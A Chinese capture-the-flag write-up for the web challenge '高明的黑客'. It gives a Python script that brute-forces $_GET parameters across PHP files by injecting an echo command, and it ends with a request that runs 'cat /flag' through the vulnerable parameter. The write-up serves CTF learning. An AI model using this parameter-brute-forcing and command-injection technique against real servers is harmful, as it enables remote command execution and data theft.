[Web] 高明的黑客 - LanceaKing xp0int Posted on May 27 2019 其实很简单,将每个php文件里的$_GET参数提取出来逐个爆破就行了。 find.py: ```python #!/usr/bin/env python3 import requests import os import re url = 'http://localhost/src/' ptn = re.compile(br"\$_GET\['(\w+)'\]") ptn1 = re.compile(br'>>> (\w+) !!!') i = 0 for f in list(os.scandir('/var/www/html/src'))[::-1]: i += 1 print(i, end='\r') with open(f.path, 'rb') as fp: data = fp.read() for get in set(ptn.findall(data)): get = get.decode('ascii') cmd = 'echo ">>> %s !!!";' % get r = requests.get(url + f.name, params={get: cmd}) if ptn1.search(r.content) is not None: print() print(f.name, get) exit() ```  get flag: `/xk0SzyKwfzw.php?Efa5BVG=cat /flag` 打赏还是打残,这是个问题 赏 Wechat Pay Alipay [Pwn] trywrite -cpt.shao [RE] JustRe - n3w
没有帐号? 立即注册